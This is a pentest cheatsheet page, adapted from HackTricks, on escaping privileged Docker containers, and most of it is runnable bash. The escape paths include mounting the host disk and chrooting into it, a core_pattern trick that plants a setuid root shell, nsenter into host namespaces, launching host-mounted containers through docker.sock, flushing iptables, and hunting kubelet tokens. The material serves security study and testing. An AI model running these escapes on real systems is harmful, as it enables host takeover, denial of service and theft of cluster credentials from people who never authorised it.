daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

privileged-containers.md (11851B)


      1 ---
      2 title: "Escaping From --privileged Containers"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/privileged-containers.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/privileged-containers.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Escaping From `--privileged` Containers
     14 
     15 ## Overview
     16 
     17 A container started with `--privileged` is not the same thing as a normal container with one or two extra permissions. In practice, `--privileged` removes or weakens several of the default runtime protections that normally keep the workload away from dangerous host resources. The exact effect still depends on the runtime and host, but for Docker the usual result is:
     18 
     19 - all capabilities are granted
     20 - the device cgroup restrictions are lifted
     21 - many kernel filesystems stop being mounted read-only
     22 - default masked procfs paths disappear
     23 - seccomp filtering is disabled
     24 - AppArmor confinement is disabled
     25 - SELinux isolation is disabled or replaced with a much broader label
     26 
     27 The important consequence is that a privileged container usually does **not** need a subtle kernel exploit. In many cases it can simply interact with host devices, host-facing kernel filesystems, or runtime interfaces directly and then pivot into a host shell.
     28 
     29 ## What `--privileged` Does Not Automatically Change
     30 
     31 `--privileged` does **not** automatically join the host PID, network, IPC, or UTS namespaces. A privileged container can still have private namespaces. That means some escape chains require an extra condition such as:
     32 
     33 - a host bind mount
     34 - host PID sharing
     35 - host networking
     36 - visible host devices
     37 - writable proc/sys interfaces
     38 
     39 Those conditions are often easy to satisfy in real misconfigurations, but they are conceptually separate from `--privileged` itself.
     40 
     41 ## Escape Paths
     42 
     43 ### 1. Mount The Host Disk Through Exposed Devices
     44 
     45 A privileged container usually sees far more device nodes under `/dev`. If the host block device is visible, the simplest escape is to mount it and `chroot` into the host filesystem:
     46 
     47 ```bash
     48 ls -l /dev/sd* /dev/vd* /dev/nvme* 2>/dev/null
     49 mkdir -p /mnt/hostdisk
     50 mount /dev/sda1 /mnt/hostdisk 2>/dev/null || mount /dev/vda1 /mnt/hostdisk 2>/dev/null
     51 ls -la /mnt/hostdisk
     52 chroot /mnt/hostdisk /bin/bash 2>/dev/null
     53 ```
     54 
     55 If the root partition is not obvious, enumerate the block layout first:
     56 
     57 ```bash
     58 fdisk -l 2>/dev/null
     59 blkid 2>/dev/null
     60 debugfs /dev/sda1 2>/dev/null
     61 ```
     62 
     63 If the practical path is to plant a setuid helper in a writable host mount rather than to `chroot`, remember that not every filesystem honors the setuid bit. A quick host-side capability check is:
     64 
     65 ```bash
     66 mount | grep -v "nosuid"
     67 ```
     68 
     69 This is useful because writable paths under `nosuid` filesystems are much less interesting for classic "drop a setuid shell and execute it later" workflows.
     70 
     71 The weakened protections being abused here are:
     72 
     73 - full device exposure
     74 - broad capabilities, especially `CAP_SYS_ADMIN`
     75 
     76 Related pages:
     77 
     78 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities)
     79 
     80 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace)
     81 
     82 ### 2. Mount Or Reuse A Host Bind Mount And `chroot`
     83 
     84 If the host root filesystem is already mounted inside the container, or if the container can create the necessary mounts because it is privileged, a host shell is often only one `chroot` away:
     85 
     86 ```bash
     87 mount | grep -E ' /host| /mnt| /rootfs'
     88 ls -la /host 2>/dev/null
     89 chroot /host /bin/bash 2>/dev/null || /host/bin/bash -p
     90 ```
     91 
     92 If no host root bind mount exists but host storage is reachable, create one:
     93 
     94 ```bash
     95 mkdir -p /tmp/host
     96 mount --bind / /tmp/host
     97 chroot /tmp/host /bin/bash 2>/dev/null
     98 ```
     99 
    100 This path abuses:
    101 
    102 - weakened mount restrictions
    103 - full capabilities
    104 - lack of MAC confinement
    105 
    106 Related pages:
    107 
    108 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace)
    109 
    110 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities)
    111 
    112 [Apparmor](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/apparmor)
    113 
    114 [Selinux](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/selinux)
    115 
    116 ### 3. Abuse Writable `/proc/sys` Or `/sys`
    117 
    118 One of the big consequences of `--privileged` is that procfs and sysfs protections become much weaker. That can expose host-facing kernel interfaces that are normally masked or mounted read-only.
    119 
    120 A classic example is `core_pattern`:<sup>[[1]](#references)</sup>
    121 
    122 ```bash
    123 [ -w /proc/sys/kernel/core_pattern ] || exit 1
    124 overlay=$(mount | sed -n 's/.*upperdir=\([^,]*\).*/\1/p' | head -n1)
    125 cat <<'EOF' > /shell.sh
    126 #!/bin/sh
    127 cp /bin/sh /tmp/rootsh
    128 chmod u+s /tmp/rootsh
    129 EOF
    130 chmod +x /shell.sh
    131 echo "|$overlay/shell.sh" > /proc/sys/kernel/core_pattern
    132 cat <<'EOF' > /tmp/crash.c
    133 int main(void) {
    134   char buf[1];
    135   for (int i = 0; i < 100; i++) buf[i] = 1;
    136   return 0;
    137 }
    138 EOF
    139 gcc /tmp/crash.c -o /tmp/crash
    140 /tmp/crash
    141 ls -l /tmp/rootsh
    142 ```
    143 
    144 Other high-value paths include:
    145 
    146 ```bash
    147 cat /proc/sys/kernel/modprobe 2>/dev/null
    148 cat /proc/sys/fs/binfmt_misc/status 2>/dev/null
    149 find /proc/sys -maxdepth 3 -writable 2>/dev/null | head -n 50
    150 find /sys -maxdepth 4 -writable 2>/dev/null | head -n 50
    151 ```
    152 
    153 This path abuses:
    154 
    155 - missing masked paths
    156 - missing read-only system paths
    157 
    158 Related pages:
    159 
    160 [Masked Paths](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/masked-paths)
    161 
    162 [Read Only Paths](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/read-only-paths)
    163 
    164 ### 4. Use Full Capabilities For Mount- Or Namespace-Based Escape
    165 
    166 A privileged container gets the capabilities that are normally removed from standard containers, including `CAP_SYS_ADMIN`, `CAP_SYS_PTRACE`, `CAP_SYS_MODULE`, `CAP_NET_ADMIN`, and many others. That is often enough to turn a local foothold into a host escape as soon as another exposed surface exists.
    167 
    168 A simple example is mounting additional filesystems and using namespace entry:
    169 
    170 ```bash
    171 capsh --print | grep cap_sys_admin
    172 which nsenter
    173 nsenter -t 1 -m -u -n -i -p sh 2>/dev/null || echo "host namespace entry blocked"
    174 ```
    175 
    176 If host PID is also shared, the step becomes even shorter:
    177 
    178 ```bash
    179 ps -ef | head -n 50
    180 nsenter -t 1 -m -u -n -i -p /bin/bash
    181 ```
    182 
    183 This path abuses:
    184 
    185 - the default privileged capability set
    186 - optional host PID sharing
    187 
    188 Related pages:
    189 
    190 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities)
    191 
    192 [Pid Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/pid-namespace)
    193 
    194 ### 5. Escape Through Runtime Sockets
    195 
    196 A privileged container frequently ends up with host runtime state or sockets visible. If a Docker, containerd, or CRI-O socket is reachable, the simplest approach is often to use the runtime API to launch a second container with host access:
    197 
    198 ```bash
    199 find / -maxdepth 3 \( -name docker.sock -o -name containerd.sock -o -name crio.sock \) 2>/dev/null
    200 docker -H unix:///var/run/docker.sock run --rm -it -v /:/mnt ubuntu chroot /mnt bash 2>/dev/null
    201 ```
    202 
    203 For containerd:
    204 
    205 ```bash
    206 ctr --address /run/containerd/containerd.sock images ls 2>/dev/null
    207 ```
    208 
    209 This path abuses:
    210 
    211 - privileged runtime exposure
    212 - host bind mounts created through the runtime itself
    213 
    214 Related pages:
    215 
    216 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace)
    217 
    218 [Runtime Api And Daemon Exposure](/hacktricks/linux-hardening/containers-namespaces/container-security/runtime-api-and-daemon-exposure)
    219 
    220 ### 6. Remove Network Isolation Side Effects
    221 
    222 `--privileged` does not by itself join the host network namespace, but if the container also has `--network=host` or other host-network access, the complete network stack becomes mutable:
    223 
    224 ```bash
    225 capsh --print | grep cap_net_admin
    226 ip addr
    227 ip route
    228 iptables -S 2>/dev/null || nft list ruleset 2>/dev/null
    229 ip link set lo down 2>/dev/null
    230 iptables -F 2>/dev/null
    231 ```
    232 
    233 This is not always a direct host shell, but it can yield denial of service, traffic interception, or access to loopback-only management services.
    234 
    235 Related pages:
    236 
    237 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities)
    238 
    239 [Network Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/network-namespace)
    240 
    241 ### 7. Read Host Secrets And Runtime State
    242 
    243 Even when a clean shell escape is not immediate, privileged containers often have enough access to read host secrets, kubelet state, runtime metadata, and neighboring container filesystems:
    244 
    245 ```bash
    246 find /var/lib /run /var/run -maxdepth 3 -type f 2>/dev/null | head -n 100
    247 find /var/lib/kubelet -type f -name token 2>/dev/null | head -n 20
    248 find /var/lib/containerd -type f 2>/dev/null | head -n 50
    249 ```
    250 
    251 If `/var` is host-mounted or the runtime directories are visible, this can be enough for lateral movement or cloud/Kubernetes credential theft even before a host shell is obtained.
    252 
    253 Related pages:
    254 
    255 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace)
    256 
    257 [Sensitive Host Mounts](/hacktricks/linux-hardening/containers-namespaces/container-security/sensitive-host-mounts)
    258 
    259 ## Checks
    260 
    261 The purpose of the following commands is to confirm which privileged-container escape families are immediately viable.
    262 
    263 ```bash
    264 capsh --print                                    # Confirm the expanded capability set
    265 mount | grep -E '/proc|/sys| /host| /mnt'        # Check for dangerous kernel filesystems and host binds
    266 ls -l /dev/sd* /dev/vd* /dev/nvme* 2>/dev/null   # Check for host block devices
    267 grep Seccomp /proc/self/status                   # Confirm seccomp is disabled
    268 cat /proc/self/attr/current 2>/dev/null          # Check whether AppArmor/SELinux confinement is gone
    269 find / -maxdepth 3 -name '*.sock' 2>/dev/null    # Look for runtime sockets
    270 ```
    271 
    272 What is interesting here:
    273 
    274 - a full capability set, especially `CAP_SYS_ADMIN`
    275 - writable proc/sys exposure
    276 - visible host devices
    277 - missing seccomp and MAC confinement
    278 - runtime sockets or host root bind mounts
    279 
    280 Any one of those may be enough for post-exploitation. Several together usually mean the container is functionally one or two commands away from host compromise.
    281 
    282 ## Related Pages
    283 
    284 [Capabilities](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/capabilities)
    285 
    286 [Seccomp](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/seccomp)
    287 
    288 [Apparmor](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/apparmor)
    289 
    290 [Selinux](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/selinux)
    291 
    292 [Masked Paths](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/masked-paths)
    293 
    294 [Read Only Paths](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/read-only-paths)
    295 
    296 [Mount Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/mount-namespace)
    297 
    298 [Pid Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/pid-namespace)
    299 
    300 [Network Namespace](/hacktricks/linux-hardening/containers-namespaces/container-security/protections/namespaces/network-namespace)
    301 
    302 ## References
    303 
    304 - [1] [Escaping privileged containers for fun](https://pwning.systems/posts/escaping-containers-for-fun/)